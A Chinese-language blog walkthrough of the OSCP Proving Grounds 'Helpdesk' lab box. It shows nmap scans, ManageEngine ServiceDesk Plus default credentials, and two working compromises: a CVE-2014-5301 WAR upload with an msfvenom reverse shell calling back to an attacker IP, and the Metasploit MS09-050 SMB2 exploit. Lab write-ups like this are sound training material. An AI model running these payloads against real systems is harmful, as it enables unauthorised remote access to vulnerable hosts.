OSCP PG Helpdesk

OSCP PG Helpdesk

Helpdesk

nmap 扫描

nmap -p- --min-rate=1000 -T4 192.168.181.43 -Pn --open -v
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
3389/tcp open  ms-wbt-server
8080/tcp open  http-proxy
扫描端口
nmap -A -Pn -p135,139,445,3389,8080 192.168.181.43 -sV -sC
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-08-06 22:05 EDT
Nmap scan report for 192.168.181.43
Host is up (0.14s latency).

PORT     STATE SERVICE       VERSION
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds  Windows Server (R) 2008 Standard 6001 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
3389/tcp open  ms-wbt-server Microsoft Terminal Service
8080/tcp open  http          Apache Tomcat/Coyote JSP engine 1.1
|_http-server-header: Apache-Coyote/1.1
|_http-title: ManageEngine ServiceDesk Plus
| http-cookie-flags: 
|   /: 
|     JSESSIONID: 
|_      httponly flag not set
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|phone|specialized
Running (JUST GUESSING): Microsoft Windows 2008|7|Phone|8.1 (90%)
OS CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1 cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows_7::sp1 cpe:/o:microsoft:windows cpe:/o:microsoft:windows_7 cpe:/o:microsoft:windows_8.1:r1
Aggressive OS guesses: Microsoft Windows Server 2008 R2 SP1 (90%), Microsoft Windows Server 2008 (87%), Microsoft Windows Server 2008 R2 (87%), Microsoft Windows Server 2008 R2 or Windows 8 (87%), Microsoft Windows 7 SP1 (87%), Microsoft Windows 8.1 Update 1 (87%), Microsoft Windows Phone 7.5 or 8.0 (87%), Microsoft Windows Embedded Standard 7 (86%), Microsoft Windows 8.1 R1 (85%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 4 hops
Service Info: Host: HELPDESK; OS: Windows; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_server_2008:r2

Host script results:
| smb2-security-mode: 
|   2:0:2: 
|_    Message signing enabled but not required
| smb-os-discovery: 
|   OS: Windows Server (R) 2008 Standard 6001 Service Pack 1 (Windows Server (R) 2008 Standard 6.0)
|   OS CPE: cpe:/o:microsoft:windows_server_2008::sp1
|   Computer name: HELPDESK
|   NetBIOS computer name: HELPDESK\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2024-08-06T19:06:08-07:00
| smb2-time: 
|   date: 2024-08-07T02:06:08
|_  start_date: 2024-08-07T01:27:42
|_nbstat: NetBIOS name: HELPDESK, NetBIOS user: <unknown>, NetBIOS MAC: 00:50:56:ab:30:08 (VMware)
| smb-security-mode: 
|   account_used: <blank>
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_clock-skew: mean: 2h20m00s, deviation: 4h02m29s, median: 0s

这个题两种做法

第一种 8080 端口 为入口 Google 搜索 manageengine servicedesk plus 7.6.0 default credentials 可以找到默认密码 有两组 administrator/administratorguest/guest

然后 exp地址

https://github.com/PeterSufliarsky/exploits

直接执行

msfvenom -p java/shell_reverse_tcp LHOST=192.168.45.222 LPORT=445 -f war > shell.war
nc -lnvp 445
python3 CVE-2014-5301.py 192.168.181.43 8080 administrator administrator shell.war

msf

search "2014-5301"

Matching Modules
================

   #  Name                                                                                       Disclosure Date  Rank       Check  Description
   -  ----                                                                                       ---------------  ----       -----  -----------
   0  exploit/multi/http/manageengine_auth_upload                                                2014-12-15       excellent  Yes    ManageEngine Multiple Products Authenticated File Upload

msf6 > use 0
msf6 exploit(multi/http/manageengine_auth_upload) > set rhosts 192.168.181.43
rhosts => 192.168.181.43
msf6 exploit(multi/http/manageengine_auth_upload) > set lhost 192.168.45.222
lhost => 192.168.45.222
msf6 exploit(multi/http/manageengine_auth_upload) > set lport 445
lport => 445
msf6 exploit(multi/http/manageengine_auth_upload) > run

第二种 ms09_050

nmap 扫描 445 端口

nmap -p445 -Pn 192.168.181.43 --script "smb*" 
msf6 exploit(windows/smb/ms09_050_smb2_negotiate_func_index) > set rhosts 192.168.181.43
rhosts => 192.168.181.43
msf6 exploit(windows/smb/ms09_050_smb2_negotiate_func_index) > set lhost 192.168.45.222
lhost => 192.168.45.222
msf6 exploit(windows/smb/ms09_050_smb2_negotiate_func_index) > set lport 445
lport => 445
msf6 exploit(windows/smb/ms09_050_smb2_negotiate_func_index) > run
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值